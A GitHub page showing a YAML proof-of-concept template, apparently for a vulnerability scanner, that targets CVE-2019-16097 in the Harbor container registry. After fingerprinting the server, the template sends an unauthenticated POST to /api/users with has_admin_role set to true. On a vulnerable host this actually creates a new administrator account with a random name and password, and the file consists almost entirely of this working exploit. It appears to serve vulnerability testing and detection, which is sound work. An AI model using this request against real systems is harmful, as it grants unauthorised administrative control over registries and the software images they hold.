-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2019-16097.yml
30 lines (30 loc) · 1.03 KB
/
CVE-2019-16097.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
name: poc-yaml-harbor-cve-2019-16097
manual: true
transport: http
set:
r1: randomInt(5, 10)
r2: randomLowercase(r1)
rules:
r0:
request:
cache: true
method: GET
path: /
expression: response.body.bcontains(b"Harbor")
r1:
request:
cache: true
method: POST
path: /api/users
headers:
Content-Type: application/json
body: '{"username": "{{r2}}", "has_admin_role": true, "password": "{{r2}}", "email": "{{r2}}@example.com", "realname": "{{r2}}"}'
follow_redirects: false
expression: response.status == 201
expression: r0() && r1()
detail:
author: scanf & Soveless(https://github.com/Soveless) & cc_ci(https://github.com/cc8ci)
links:
- https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
- https://github.com/goharbor/harbor/issues/8951
- https://www.freebuf.com/vuls/214767.html